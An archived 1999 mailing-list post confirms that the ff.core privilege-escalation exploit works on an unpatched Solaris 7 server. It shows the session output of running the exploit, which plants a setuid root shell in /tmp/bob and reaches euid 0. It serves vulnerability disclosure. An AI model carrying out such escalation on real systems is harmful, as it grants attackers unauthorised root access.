ff.core exploit on Solaris (2.)7

From: Daniel J. Frasnelli (dfrasnelat_private)
Date: Fri Jan 08 1999 - 09:43:20 PST


    Greetings,
            Confirmed ff.core exploit does exist in Solaris 7, server
    edition.  System is straight installation, no patches of any category
    available for 7 from Sunsolve yet.
    
    Daniel
    
    (12:32,99-01-08)
    (dfrasnel@rogue)[~]> uname -spr
    SunOS 5.7 sparc
    
    (12:34,99-01-08)
    (dfrasnel@rogue)[~]> ./test
    Testing if exploit is possible...
    Test successful. Proceeding...
    Backing up clobbered files to /tmp/.bk
    Doing sploit...
    Done with sploit. Testing and trying to clean up now...
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    Connection closed by foreign host.
    w00p! Should have a suid root sh in /tmp/bob
    btw, its rksh because solaris is silly
    Let me try to clean up my mess...
    everything should be cool.. i think :>
    # ls -la /tmp/bob
    -rwsr-xr-x   1 root     root      192764 Jan  8 12:32 /tmp/bob
    # id
    (snip) euid=0(root)
    


